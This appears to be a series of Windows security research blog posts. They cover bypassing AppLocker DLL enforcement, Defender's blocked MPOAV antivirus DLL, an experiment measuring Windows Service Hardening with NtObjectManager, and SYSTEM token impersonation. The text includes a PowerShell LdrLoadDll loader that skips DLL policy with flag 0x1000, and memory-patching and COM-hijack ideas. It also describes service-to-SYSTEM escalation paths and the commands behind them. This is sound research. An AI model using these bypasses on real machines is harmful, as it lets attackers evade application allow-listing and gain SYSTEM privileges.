If we look back at the calling code in LdrpMapDllNtFileName we notice there are two conditions which must be met before the check is made, the LoadFlags must not have the flag 0x100 set and LdrpAdvapi32DllHandle must be non-zero.

The most obvious condition to modify is LdrpAdvapi32DllHandle. If you already have code running (say VBA) you could use WriteProcessMemory to modify the memory location of LdrpAdvapi32DllHandle to be 0. Now any calls to LoadLibrary will not get verified and you can load any DLL you like outside of policy. In theory you might also be able to get the load of ADVAPI32 to fail. However unless LdrLoadDll returns STATUS_NOT_FOUND for the DLL load then the error causes the process to fail during initialization. As ADVAPI32 is in the known DLLs I can't see an easy way around this (I tried by renaming the main executable trick from the AMSI bypass).

The other condition, the LoadFlags, is more interesting. There still exists a documented LOAD_IGNORE_CODE_AUTHZ_LEVEL flag you can pass to LoadLibraryEx which used to be able to bypass AppLocker DLL verification. However, as with SANDBOX_INERT, this was in theory limited to only System and TrustedInstaller with KB2532445, although according to Stefan Kanthak it might not be blocked. That said I can't get this flag to do anything on Windows 10 1909, and tracing through LdrLoadDll it doesn't look like it's ever used. Where does this 0x100 flag come from then? It seems it's set by the LdrpDllCharacteristicsToLoadFlags function at the start of LdrLoadDll, which looks like the following:

int LdrpDllCharacteristicsToLoadFlags(int DllCharacteristics) {
  int load_flags = 0;
  // ...
  if (DllCharacteristics & 0x1000)
    load_flags |= 0x100;
   
  return load_flags;
}

If we pass in 0x1000 as a DllCharacteristics flag, which is the second parameter to LdrLoadDll, then the DLL will not be verified against the DLL policy (putting the flag in the DLL's PE headers doesn't seem to work as far as I can tell). The DLL Characteristic flag 0x1000 is documented as IMAGE_DLLCHARACTERISTICS_APPCONTAINER but I don't know what API sets this flag in the call to LdrLoadDll. My original guess was LoadPackagedLibrary but that doesn't seem to be the case.

A simple PowerShell script to test this flag is below:
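This is just a minimal sketch rather than the exact script: it P/Invokes LdrLoadDll directly so the DllCharacteristics value can be passed as the second parameter (the DllLoader wrapper type is purely illustrative).

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

[StructLayout(LayoutKind.Sequential)]
public struct UNICODE_STRING
{
    public ushort Length;
    public ushort MaximumLength;
    [MarshalAs(UnmanagedType.LPWStr)] public string Buffer;
}

public static class DllLoader
{
    // NTSTATUS LdrLoadDll(PWSTR SearchPath, PULONG DllCharacteristics,
    //                     PUNICODE_STRING DllName, PVOID* BaseAddress)
    [DllImport("ntdll.dll")]
    private static extern int LdrLoadDll(IntPtr SearchPath, ref int DllCharacteristics,
        ref UNICODE_STRING DllName, out IntPtr BaseAddress);

    public static int Load(string path, int characteristics, out IntPtr handle)
    {
        UNICODE_STRING name = new UNICODE_STRING();
        name.Length = (ushort)(path.Length * 2);
        name.MaximumLength = (ushort)(name.Length + 2);
        name.Buffer = path;
        return LdrLoadDll(IntPtr.Zero, ref characteristics, ref name, out handle);
    }
}
"@

function Start-Dll {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$DllCharacteristics = 0
    )
    $handle = [IntPtr]::Zero
    $status = [DllLoader]::Load($Path, $DllCharacteristics, [ref]$handle)
    if ($status -ne 0) {
        Write-Error ("LdrLoadDll failed with NTSTATUS 0x{0:X8}" -f $status)
    } else {
        Write-Host ("Loaded {0} at 0x{1:X}" -f $Path, $handle.ToInt64())
    }
}
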
If you run Start-Dll "Path\To\Any.DLL" where the DLL is not in an allowed location you should find it fails. However if you run Start-Dll "Path\To\Any.DLL" 0x1000 you'll find the DLL now loads.

Of course realistically the point of DLL blocking is to stop you bypassing the process blocking by using the DLL loader instead. Without being able to call LdrLoadDll or write to process memory it won't be easy to bypass the DLL verification (though of course it's not impossible).

This is the last part on AL for a while, I've got to do other things. I might revisit this topic later to discuss AppX support, SmartLocker and some other fun tricks.

The Mysterious Case of a Broken Virus Scanner

On the VM (with a default Windows 10 1909 install) I used for my AppLocker series I wanted to test out the new Edge. I opened the old Edge and tried to download the canary installer, however the download failed; Edge said the installer had a virus and it'd been deleted. How rude! I also tried the download in Chrome on the same machine with the same result, even ruder!

Downloading Edge Canary in Edge with AppLocker. Shows a bar that the download has been deleted because it's a virus.

Oddly it worked if I turned off DLL Rule Enforcement, but not when I enabled it again. My immediate thought was that the virus checking was trying to map the executable and somehow hitting the DLL verification callback, failing because the file was in my Downloads folder which is not in the default rule set. That seemed pretty unlikely, however clearly something was being blocked from running. Fortunately AppLocker maintains an Audit Log under "Applications and Services Logs -> Microsoft -> Windows -> AppLocker -> EXE and DLL" so we can quickly diagnose the failure.

Failing DLL load in audit log showing it tried to load %OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL

The failing DLL load was for "%OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL". This makes sense, the default rules only permit %WINDIR% and %PROGRAMFILES% for normal users, however %OSDRIVE%\ProgramData is not allowed. This is intentional as you don't want to grant access to locations a normal user could write to, so generally allowing all of %ProgramData% would be asking for trouble. [update:20191206] of course this is known about (I'm not suggesting otherwise), AaronLocker should allow this DLL by default.

I thought it'd at least be interesting to see why it fails and what MPOAV is doing. As the same failure occurred in both Edge (I didn't test IE) and Chrome it was clearly some common API they were calling. As Chrome is open source it made more sense to look there. Tracking down the resource string for the error led me to this code. The code was using the Attachment Services API, which is a common interface to verify downloaded files and attachments, apply MOTW and check for viruses.

When the IAttachmentExecute::Save method is called the file is checked for viruses using the currently registered anti-virus COM object which implements the IOfficeAntiVirus interface. The implementation for that COM class is in MPOAV.DLL, which as we saw is blocked so the COM object creation fails. And a failure to create the object causes the Save method to fail and the Attachment Services code to automatically delete the file so the browser can't even do anything about it such as ask the user. Ultra rude!

You might wonder how this COM class is registered? An implementor needs to register their COM object with a Category ID of "{56FFCC30-D398-11d0-B2AE-00A0C908FA49}". If you have OleViewDotNet setup (note there are other tools) you can dump all registered classes using the following PowerShell command:

Get-ComCategory -CatId '56FFCC30-D398-11d0-B2AE-00A0C908FA49' | Select -ExpandProperty ClassEntries

On a default installation of Windows 10 you should find a single class, "Windows Defender IOfficeAntiVirus implementation" registered which is implemented in the MPOAV DLL. We can try and create the class with DLL enforcement to convince ourselves that's the problem:

PowerShell error when creating MSOAV COM object. Fails with AppLocker policy block error.

No doubt this has been documented before (and I've not looked [update:20191206] of course Hexacorn blogged about it) but you could probably COM hijack this class (or register your own) and get notified of every executable downloaded by the user's web browser. Perhaps even backdoor everything. I've not tested that however ;-)

This issue does demonstrate a common weakness with any application allow-listing solution. You've got to add a rule to allow this (probably undocumented) folder in your DLL rules. Or you could allow-list all Microsoft Defender certificates I suppose. Potentially both of these criteria could change and you end up having to fix random breakage which wouldn't be fun across a large fleet of machines. It also demonstrates a weird issue with attachment scanning, if your AV is somehow misconfigured things will break and there's no obvious reason why. Perhaps we need to move on from using outdated APIs to do this process or at least handle failure better.

Empirically Assessing Windows Service Hardening

In the past few years there have been numerous exploits for service to system privilege escalation. Primarily they revolve around the fact that system services typically have impersonation privilege. What this means is that given access to a suitable token handle of an administrator (say through the Rotten Potato attack) you can impersonate and elevate from a lower-privileged service account to SYSTEM. The problem for discoverers of these attacks is that Microsoft do not consider them something which needs to be fixed with a security bulletin, as having SeImpersonatePrivilege is basically a massive security hole. However MS go and fix them silently, making it unclear if they care or not.

Of course, none of this is really new, Cesar Cerrudo detailed these sorts of service attacks in Token Kidnapping and Token Kidnapping's Revenge. The novel element recently is how to get hold of the access token, for example via negotiating local NTLM authentication. Microsoft seem to have been fighting this fire for almost 10 years and still have not gotten it right. In shades of UAC, a significant security push to make services more isolated and secure has been basically abandoned because (presumably) MS realized it was an indefensible boundary.

That's not to say there haven't been interesting service account to SYSTEM bugs which Microsoft have fixed. The most recent example is CVE-2019-1322 which was independently discovered by multiple parties (DonkeysTeam, Ilias Dimopoulos and Edward Torkington/Phillip Langlois of NCC). To understand the bug you should probably read one of the write-ups (NCC one here) but the gist is, the Update Orchestrator Service had a service security descriptor which allowed "NT AUTHORITY\SERVICE" full access. It so happens that all system services, including lower-privileged ones, have this group and so you could reconfigure the service (which was running as SYSTEM) to point to any other binary, giving a direct service to SYSTEM privilege escalation.

That begs the question, why was CVE-2019-1322 special enough to be fixed and not issues related to impersonation? Perhaps it's because this issue didn't rely on impersonate privileges being present? It is possible to configure services to not have impersonate privilege, so presumably if you could go from a non-impersonate service to an impersonate service that would count as a boundary? Again probably not, for example this bug which abuses the scheduled task service to regain impersonate privilege wouldn't likely be fixed by Microsoft.

That lack of clarity is why I tweeted to Nate Warfield and ultimately to Matt Miller asking for some advice with respect to the MSRC Security Servicing Guidelines. The result is, even if the service doesn't have impersonate privilege it wouldn't be a defended boundary if all you get is the same user with additional privileges as you can't block yourself from compromising yourself. This is the UAC argument over again, but IMO there's a crucial difference, Windows Service Hardening (WSH) was supposed to fix this problem for us in Vista. Unsurprisingly Cesar Cerrudo also did a presentation about this at the inaugural (maybe?) Infiltrate in 2011.

The question I had was, is WSH still as broken as it was in 2011? Has anything changed which made WSH finally live up to its goal of making a service compromise not equal to a full system compromise? To determine that I thought I'd run an experiment on Windows 10 1909. I'm only interested in the features which WSH touches which led me to the following hypothesis:

"Under Windows Service Hardening one service without impersonate privilege can't write to the resources of another service which does have the privilege, even if the same user, preventing full system compromise."

The hypothesis makes the assumption that if you can write to another service's resources then it's possible to compromise that other service. If that other service has SeImpersonatePrivilege then that inevitably leads to full system compromise. Of course that's not necessarily the case, the resource being written to might be uninteresting, however as a proxy this is sufficient as the goal of WSH is to prevent one service modifying the data of another even though they are the same underlying user.

WSH Details

Before going into more depth on the experiment, let's quickly go through the various features of WSH and how they're expressed. If you know all this you can skip to the description of the experiment and the results.

Limited Service Accounts and Reduced Privilege

This feature is by far the oldest attempt to harden services, the introduction of the LOCAL SERVICE (LS) and NETWORK SERVICE (NS) accounts. Prior to the accounts' introduction there were only two ways of configuring the user for a system service on Windows: either the fully privileged SYSTEM account or creating a local/domain user which has the "Log on as a Service" right. The two accounts were introduced in XP SP2 (I believe) after worms such as Blaster basically got SYSTEM privilege through remotely attacking exposed services. The two service accounts are not administrator accounts which means they shouldn't be able to directly compromise the system. The accounts are very similar on Windows 10 1909, they are both assigned the following groups*:

BUILTIN\Users
CONSOLE LOGON
Everyone
LOCAL
NT AUTHORITY\Authenticated Users
NT AUTHORITY\LogonSessionId_X_Y
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization

* Technically this isn't 100% accurate, on my machine the LS account has some extra capability groups, but we'll ignore those for this blog post.

No Administrator group in sight. Each service token gets a unique Logon Session ID SID which will be important later. The service accounts also have a limited set of privileges, as shown below:

SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeSystemTimePrivilege†
SeTimeZonePrivilege
SeUndockPrivilege

† NETWORK SERVICE doesn't have SeSystemTimePrivilege.

The two privileges I've highlighted, SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege give these accounts effectively full system access when combined with a suitable privileged token. Part of WSH is also giving control over what privileges the service account actually requires. The default is to allow all privileges, however when configuring a service you can specify a list of privileges to restrict the service to. For example the CDPSvc service is configured to only require SeImpersonatePrivilege. Quite why they bother to put this restriction on the service I don't know ¯\_(ツ)_/¯.
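
You can check the privilege list configured for a service with sc.exe; for CDPSvc it should show just SeImpersonatePrivilege:

PS> sc.exe qprivs cdpsvc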

What's the difference between LS and NS? The primary difference is LS has no network credentials, so accessing network resources as that user would only succeed as an anonymous login. NS on the other hand is created with the credentials of the computer account and so can interact with the network for resources allowed by that authentication. This only really matters to domain joined machines, standalone machines would not share the computer account with anyone else.

Per-Service SID

The first big addition in WSH was the Per-Service SID. This SID is automatically added by the SCM to the list of default groups shown previously when creating the service's primary token. The service SID is also added with the SE_GROUP_OWNER flag set and is not mandatory, which means it can be set as the token's default owner when creating new resources and it can be disabled. The basic idea is a service can ACL its resources to this SID to prevent other services from accessing them. The use of a service SID is optional, but the majority of default services are configured to use it. An example SID for CDPSvc is as follows:

S-1-5-80-3433512109-503559027-1389316256-1766580070-2256751264

The SID is derived by generating a SHA1 hash of the service name and adding that as the SID's RIDs (with an extra 80 at the start to signify it's a service SID). The use of a hash should make it extremely unlikely two services would generate the same SID.
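
As an illustration, here's a minimal sketch of that derivation (the function name is mine); it should reproduce the CDPSvc SID shown above and can be cross-checked with "sc.exe showsid cdpsvc":

function Get-ServiceSidString {
    param([Parameter(Mandatory)][string]$Name)
    # SHA1 of the upper-case, UTF-16LE encoded service name, split into five 32-bit RIDs.
    $sha1 = [System.Security.Cryptography.SHA1]::Create()
    $hash = $sha1.ComputeHash([System.Text.Encoding]::Unicode.GetBytes($Name.ToUpperInvariant()))
    $rids = foreach ($i in 0..4) { [BitConverter]::ToUInt32($hash, $i * 4) }
    "S-1-5-80-" + ($rids -join "-")
}

PS> Get-ServiceSidString CDPSvc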

Of course it's up to the service to actually ACL their resources appropriately. To aid in that the token's default DACL is also configured to the following (for CDPSvc):

- Type  : Allowed
- Name  : NT AUTHORITY\SYSTEM
- Access: Full Access

- Type  : Allowed
- Name  : OWNER RIGHTS
- Access: ReadControl

- Type  : Allowed
- Name  : NT SERVICE\CDPSvc
- Access: Full Access

The three entries grant SYSTEM and the service SID full access to any resources with this DACL. It then limits the owner of the resource through OWNER RIGHTS to only READ_CONTROL access. This directly prevents one service account accessing the resources of another for write access. Unfortunately the default DACL is only applied when there's no other access control specified, either explicitly at creation time or due to inheritance. 

One other thing to point out is that Windows still has shared services through the use of SVCHOST. If multiple services are registered in a specific SVCHOST instance then the SCM will create the token with all service SIDs in the group list and default DACL even if a service isn't currently loaded in the host. That has become less of an issue since Windows 1703; as long as you have greater than 3.5GB of RAM services will run in separate SVCHOST instances and all services will be totally separate.
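
You can see how services are currently grouped into SVCHOST instances on a given machine with:

PS> tasklist /svc /fi "imagename eq svchost.exe"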

Write-Restricted Token

The second big addition to WSH was the concept of Write-Restricted (WR) tokens. Restricted tokens have existed since Windows 2000 and are created using the NtFilterToken system call. The basic concept is the token can have a list of additional groups which are consulted whenever an access check is performed. First the access check is run on the default group list; if access would be granted the access check is run again on the restricted SIDs. If the second check is successful then the access check passes, if not access is denied.

Restricted tokens are used for sandboxing (such as in Chrome) but are difficult to setup correctly as it blocks all access equally including reading critical files on disk. WR tokens solve the access problem by only blocking write access but leaving read and execute access alone. 

In order for a service configured as WR to write to a resource the associated security descriptor must contain the required access for one of the following restricted SIDs.

Everyone
NT AUTHORITY\LogonSessionId_X_Y
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\SERVICE_NAME

The WRITE RESTRICTED SID is a special group SID which resources can apply if they expect a service to write to the resource. This SID is also added to the token's groups by the SCM so that it can be used to pass both checks. By combining service SIDs and WR the amount of resources a service can modify should be significantly reduced.
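
Whether a service uses a service SID at all, and whether that SID is write-restricted, is part of the service configuration; you can query it with sc.exe, which reports NONE, UNRESTRICTED or RESTRICTED:

PS> sc.exe qsidtype cdpsvc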

And the Rest

There are a few things which are technically part of service hardening which we won't really consider for the experiment:

The main one is additional rules in the firewall to block network services or requests being made from a service. This is arguably more to prevent remote compromise than it is to prevent cross-service attacks. 

Another is Session 0 Isolation and System Integrity Level. Session 0 Isolation was introduced to prevent Shatter Attacks, by preventing any windows being created by a service on the same desktop as a normal user. System Integrity Level through UIPI then prevents attacks even if the service did create a window on a normal user desktop as it'd be at a much higher IL (even than Administrators). The System IL does admittedly also have a security access check function but it's not that important for cross-service attacks.

Experiment Procedure

On to the experiment itself. Based on the hypothesis I presented earlier the goal is to determine if you can write to resources of one service from another service even though they're the same user. To make this testable I decided on the following procedure:

Step 1: Build an access token for a service which doesn't exist on the system.
Step 2: Enumerate all resources of a specific type which are owned by the token owner and perform an access check using the token.
Step 3: Collate the results based on the type of resource and whether write access was granted.

The reason for choosing to build a token for a non-existent service is it ensures we should only see the resources that could be shared by other services as the same user, not any resources which are actually designed to be accessible by being created by a service. These steps need to be repeated for different access tokens, we'll use the following five:
  • LOCAL SERVICE
  • LOCAL SERVICE, Write Restricted
  • NETWORK SERVICE
  • NETWORK SERVICE, Write Restricted
  • Control
We'll test both normal service SID and WR versions of the access token to see if it makes much of a difference. One thing to determine is what to use as a control. Ideally the control would be another service account with WSH disabled. However I couldn't find a way to disable WSH entirely to do this test, so instead we need some other control. If our hypothesis holds and WSH is effective we'd expect no resources to be writable, therefore we need to pick a control account where we know this is not true. The easiest is just to use the current logged on user account, it should be able to access almost all its own resources.

What resources do we want to inspect? The obvious type is Process/Thread resources. Getting write access to either of these in another service is probably trivial to convert into full system compromise through impersonation. We'd want to get a bigger picture however, so it'd be useful to include Files, Registry keys and Named Kernel Objects. These resources might not directly lead to compromise but it does give us a general idea of the maximum impact.

It's worth noting that the hypothesis made a point to specify writing to the resources of a service which has impersonate privilege from one which does not. However this experimental process will only base the analysis on whether the resource is owned by the service user. This is intentional, it'd be too complex to attribute the resource to a specific service in all cases. However an assumption is made that more services running as a specific user have impersonate privilege than do not, therefore in all probability any resource you can write to is probably owned by one of them. We could verify that assumption if we liked, but I'll probably not.

Finally, a good experiment should be something which can be repeatable and verifiable. To that end I'll provide all the code necessary to perform the steps, written in PowerShell and using my NtObjectManager module. If you want to re-run the experiment you should be able to do so and produce a very similar set of results.

Experiment Procedure Detail

On to the specific PowerShell steps to perform the experiment. First off you'll need my NtObjectManager module, specifically at least version 1.1.25 as I've added a few extra commands to simplify the process. You will also need to run all the commands as the SYSTEM user; some commands will need it (such as getting access tokens), others benefit from the elevated privileges. From an admin command prompt you can create a SYSTEM PowerShell console using the following command:

Start-Win32ChildProcess -RequiredPrivilege SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege powershell

This command will find a SYSTEM process to create the new process from which also has, at a minimum, the specified list of privileges. Due to the way the process is created it'll also have full access to the current desktop so you can spawn GUI applications running at system if you need them.

The experiment will be run on a VM of Windows 1909 Enterprise updated to December 2019 from a split-token admin user account. This just ensures the minimum amount of configuration changes and additional software is present. Of course there's going to be variability in the number of services running at any one time, and there's not a lot which can be done about that. However it's expected that the result should be the same even if the individual resources available are not. If you were concerned you could rerun the experiment on multiple different installs of Windows at different times of day and aggregate the results.

Creating the Access Tokens

We need to create 5 access tokens for the test. Ideally we'd like to create the four service tokens using the exact method used by the SCM. We could register our unknown service and start the service to steal its token. There is also an undocumented RGetServiceProcessToken SCM RPC method in newer versions of Windows 10. However I think creating a service risks some resources being populated with that service's identity which might not be what we really want. Instead we can use LogonUserExExW which is what the SCM uses, with the LOGON32_LOGON_SERVICE type to create LS and NS tokens. This will work as long as we have SeTcbPrivilege. We'll then just add the appropriate groups, convert to WR,  and remove privileges as necessary. We can get to the LogonUserExExW API using Get-NtToken. I've wrapped up everything into a function Get-ServiceToken, you can see the full function in the final script. Using this function we can create all the tokens we need using the following commands:

$tokens = @()
$tokens += Get-ServiceToken LocalService FakeService
$tokens += Get-ServiceToken LocalService FakeService -WriteRestricted
$tokens += Get-ServiceToken NetworkService FakeService
$tokens += Get-ServiceToken NetworkService FakeService -WriteRestricted

For the control token we'll get the unmodified session access token for the current desktop. Even though we're running as SYSTEM, since we're on the same desktop we can just use the following command:

$tokens += Get-NtToken -Session -Duplicate

Random note. When calling LogonUserExExW and requesting a service SID as an additional group the call will fail with access denied. However this only happens if the service SID is the first NT Authority SID in the additional groups list. Putting any other NT Authority SID, including our new logon session SID before the service SID makes it work. Looking at the code in LSASRV (possibly the function LsapCheckVirtualAccountRestriction) it looks like the use of a service SID should be restricted to the first process (based on its PID) that used a service SID which would be the SCM. However if another NT Authority SID is placed first the checking loop sets a boolean flag which prevents the loop checking any more SIDs and so the service SID is ignored. I've no idea if this is a bug or not, however as you need TCB privilege to set the additional groups I don't think it's a security issue.

Resource Checking and Result Collation

With the 5 tokens in hand we can progress to assessing accessible resources. The original purpose of my Sandbox Analysis tools was finding accessible resources from a sandbox process, however the same code is capable of finding resources accessible from any access token, including service tokens.

First, by way of example, let's run checks for processes and threads:

$ps = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ProcessOnly -AllowEmptyAccess
$ts = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ThreadOnly -AllowEmptyAccess

We can pass a list of tokens to the checking command, this improves performance as we only do the enumeration of resources for every token group then do the access check. Each generated access result has a TokenId property which indicates the unique ID of the token which was used for the check, this allows us to extract the correct results later. We also specify the AllowEmptyAccess option, which will generate a result even if the access check fails and the token has no access to the resource. This will be useful to allow us to assess what resources are owned by the token's owner SID but we were not granted access.

Let's do the rest of the resources:

$os = Get-AccessibleObject \ -Recurse `
    -Tokens $tokens -AllowEmptyAccess
$fs = Get-AccessibleFile -Win32Path "$env:SystemDrive\" `
    -FormatWin32Path -Recurse -Tokens $tokens -AllowEmptyAccess
$ks = Get-AccessibleKey \Registry -FormatWin32Path -Recurse `
    -Tokens $tokens -AllowEmptyAccess

We'll only get the accessible files on the system drive in this case as that'll be the only drive in the VM. Note that Get-AccessibleObject doesn't check ALPC ports, it's not possible to open an ALPC port by name and read its security descriptor. We'll ignore ALPC ports for this experiment, as it's probably worthy of a topic all on its own.

We now have all the results we need in five variables along with the tokens. If you want to run it yourself the final script is on Github here. It'll take a fair amount of time to run but once it's complete you'll find 5 CSV files in the current directory containing the results for each token.

Experiment Results

We now need to do our basic analysis of the results. Let's start with calculating the percentage of writable resources for each token type relative to the total number of resources. From my single experiment run I got the following table:

Token            Writable   Writable (WR)   Total
Control          99.83%     N/A             13171
Network Service  65.00%     0.00%           300
Local Service    62.89%     0.70%           574

As we expected the control token had almost 100% of the owned resources writable by the user. However the two service accounts both had over 60% of their owned resources writable when using an unrestricted token. That level is almost completely eliminated when using a WR token: there were no writable resources for NS and only 4 resources writable from LS, which was less than 1%. Those 4 resources were just Events, from a service perspective not very exciting, though they were ACL'ed to Everyone which is unusual.

Just based on these numbers alone it would seem that WSH really is a failure when used unrestricted but is probably fine when used in WR mode. It'd be interesting to dig into what types are writable in the unrestricted mode to get a better understanding of where WSH is failing. This is what I've summarized in the following table:

Type          LS Writable %   LS Writable   NS Writable %   NS Writable
Directory     0.28%           1             0.51%           1
Event         1.66%           6             0.51%           1
File          74.24%          268           48.72%          95
Key           22.44%          81            49.23%          96
Mutant        0.28%           1             0.51%           1
Process       0.28%           1             0.00%           0
Section       0.55%           2             0.00%           0
SymbolicLink  0.28%           1             0.51%           1
Thread        0.00%           0             0.00%           0

The clear winners, if there is such a thing, are Files and Registry Keys, which take up over 95% of the resources which are writable. Based on what we know about how WSH works this is understandable. The likelihood is any keys/files are getting their security through inheritance from the parent container. This will typically result in at least the owner field being the service account, which grants WRITE_DAC access, or the inherited DACL will contain a CREATOR OWNER SID which results in an explicit access entry for the service account.

What is perhaps more interesting is the results for Processes and Threads: neither NS nor LS have any writable threads and only LS has a single writable process. The primary reason for the lack of writable threads and processes is the default DACL which is used for new processes when an explicit DACL isn't specified. The DACL has an OWNER RIGHTS SID granted only READ_CONTROL access; the result is that even if the owner of the resource is the service account it isn't possible to write to it. The only way to get full access as per the default DACL is by having the specific service SID in your group list.

Why does LS have one writable process? This I think is probably a "bug" in the Audio Service which creates the AUDIODG process. If we look at the security descriptor of the AUDIODG process we see the following:

<Owner>
 - Name  : NT AUTHORITY\LOCAL SERVICE

<DACL>
 - Type  : Allowed
 - Name  : NT SERVICE\Audiosrv
 - Access: Full Access

 - Type  : Allowed
 - Name  : NT AUTHORITY\Authenticated Users
 - Access: QueryLimitedInformation

The owner is LS which will grant WRITE_DAC access to the resource if nothing else is in the DACL to stop it. However the default DACL's OWNER RIGHTS SID is missing from the DACL, which means this was probably set explicitly by the Audio Service to grant Authenticated Users query access. This results in the access not being correctly restricted from other service accounts. Of course AUDIODG has SeImpersonatePrivilege so if you find yourself inside a LS unrestricted process with no impersonate privilege you can open AUDIODG (if running) for WRITE_DAC, change the DACL to grant full access and get back impersonate privileges.

If you look at the results, one other odd thing you'll notice is that while there are readable threads there are no readable processes. What's going on? If we look at a normal LS service process' security descriptor we see the following:

<Owner>
 - Name  : NT AUTHORITY\LogonSessionId_0_202349

<DACL>
 - Type  : Allowed
 - Name  : NT AUTHORITY\LogonSessionId_0_202349
 - Access: Full Access

 - Type  : Allowed
 - Name  : BUILTIN\Administrators
 - Access: QueryInformation|QueryLimitedInformation

We should be able to see the reason: the owner is not LS, but instead the logon session SID which is unique per-service. This blocks other LS processes from having any access rights by default. Then the DACL only grants full access to the logon session SID; even administrators are apparently not to be trusted (though they can typically just bypass this using SeDebugPrivilege). This security descriptor is almost certainly set explicitly by the SCM when creating the process.

Is there anything else interesting in the writable resources outside of the files and keys? The one interesting result shared between NS and LS is a single writable Object Directory each. We can take a look at the results to find out what directories these are, to see if they share any common purpose. The directory paths are \Sessions\0\DosDevices\00000000-000003e4 for NS and \Sessions\0\DosDevices\00000000-000003e5 for LS. These are the service account's DOS Device directories, the default location to start looking up drive mappings. As the accounts can write to their respective directory this gives another angle of attack: you can compromise any service process running as the same user by dropping a mapping for the C: drive and waiting for the process to load a DLL. Leaving that angle open seems sloppy, but it's not like there are no alternative routes to compromise another service.

I think that's the limit of my interest in analysis. I've put my results up on Google Drive here if you want to play around yourself.

Conclusions

Even though I've not run the experiment on multiple machines, at different times with different software I think I can conclude that WSH does not provide any meaningful security boundary when used in its default unrestricted mode. Based on the original hypothesis we can clearly write to resources not created by a service and therefore could likely fully compromise the system. The implementation does do a good job of securing process and thread resources which provide trivial elevation routes but that can be easily compromised if there's appropriate processes running (including some COM services). I can fully support this not being something MS would want to defend through issuing bulletins.

However when used in WR mode WSH is much more comprehensive. I'd argue that as long as a service doesn't have impersonate privilege then it's effectively sandboxed if running with a WR token. MS already support sandbox escapes as a defended boundary so I'm not sure why WR sandboxes shouldn't also be included as part of that. For example if the trick using the Task Scheduler worked from a WR service I'd see that as circumventing a security boundary, however I don't work in MSRC so I have no influence on what is or is not fixed.

Of course in an ideal world you wouldn't use shared accounts at all. Versions of Windows since 7 have support for Virtual Service Accounts where the service user is the service SID rather than a standard service account and the SCM even limits the service's IL to High rather than System. Of course by default these accounts still have impersonate privilege, however you could also remove that.
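
For reference, switching an existing service over to its virtual service account is just a matter of setting the account to NT SERVICE\<ServiceName>, no password needed; for example (MyService is a placeholder name):

PS> sc.exe config MyService obj= "NT SERVICE\MyService"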

Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N)

This is just a quick follow on from my last post on Windows Service Hardening. I'm going to pick up on why you shouldn't use a SYSTEM token for a sandbox token. Specifically I'll describe an unexpected behavior when you mix the SYSTEM user and SeImpersonatePrivilege, or more specifically if you remove SeImpersonatePrivilege.

As I mentioned in the last post it's possible to configure services with a limited set of privileges. For example you can have a service where you're only granted SeTimeZonePrivilege and every other default privilege is removed. Interestingly you can do this for any service running as SYSTEM. We can check what services are configured without SeImpersonatePrivilege with the following PS.

PS> Get-RunningService -IncludeNonActive | ? { $_.UserName -eq "LocalSystem" -and $_.RequiredPrivileges.Count -gt 0 -and "SeImpersonatePrivilege" -notin $_.RequiredPrivileges } 

On my machine that lists 22 services which are super secure and don't have SeImpersonatePrivilege configured. Of course the SYSTEM user is so powerful that surely it doesn't matter whether they have SeImpersonatePrivilege or not. You'd be right but it might surprise you to learn that for the most part SYSTEM doesn't need SeImpersonatePrivilege to impersonate (almost) any user on the computer.

Let's see a diagram for the checks to determine if you're allowed to impersonate a Token. You might know it if you've seen any of my presentations, or read part 3 of Reading Your Way Around UAC.

Impersonation flowchart, showing that there's an Origin Session Check.

Actually this diagram isn't exactly like the ones I've shown before; I changed one of the boxes. Between the IL check and the User check I've added a box for "Origin Session Check". I've never bothered to put this in before as it didn't seem that important in the grand scheme. In the kernel function SeTokenCanImpersonate the check looks basically like:

if (proctoken->AuthenticationId == 
    imptoken->OriginatingLogonSession) {
    return STATUS_SUCCESS;
}

The check is therefore, if the current Process Token's Authentication ID matches the Impersonation Token's OriginatingLogonSession ID then allow impersonation. Where is OriginatingLogonSession coming from? The value is set when an API such as LogonUser is used, and is set to the Authentication ID of the Token calling the API. This check allows a user to get back a Token and impersonate it even if it's a different user which would normally be blocked by the user check. Now what Token authenticates all new users? SYSTEM does, therefore almost every Token on the system has an OriginatingLogonSession value set to the Authentication ID of the SYSTEM user.

Not convinced? We can test it from an admin PS shell. First create a SYSTEM PS shell from an Administrator PS shell using:

PS> Start-Win32ChildProcess powershell

Now in the SYSTEM PS shell check the current Token's Authentication ID (yes I know Pseduo is a typo ;-)).

PS> $(Get-NtToken -Pseduo).AuthenticationId

LowPart HighPart
------- --------
    999        0

Next remove SeImpersonatePrivilege from the Token:

PS> Remove-NtTokenPrivilege SeImpersonatePrivilege

Now pick a normal user token, say from Explorer and dump the Origin.

PS> $p = Get-NtProcess -Name explorer.exe
PS> $t = Get-NtToken -Process $p -Duplicate
PS> $t.Origin

LowPart HighPart
------- --------
    999        0

As we can see the Origin matches the SYSTEM Authentication ID. Now try and impersonate the Token and check what the resultant impersonation level assigned was:

PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
Impersonation

We can see the final line shows the impersonation level as Impersonation. If we'd been blocked impersonating the Token it'd be set to Identification level instead.

If you think I've made a mistake we can force failure by trying to impersonate a SYSTEM token but at a higher IL. Run the following to duplicate a copy of the current token, reduce IL to High then test the impersonation level.

PS> $t = Get-NtToken -Duplicate
PS> Set-NtTokenIntegrityLevel High
PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
Identification

As we can see, the level has been set to Identification. If SeImpersonatePrivilege was being granted we'd have been able to impersonate the higher IL token as the privilege check is before the IL check.

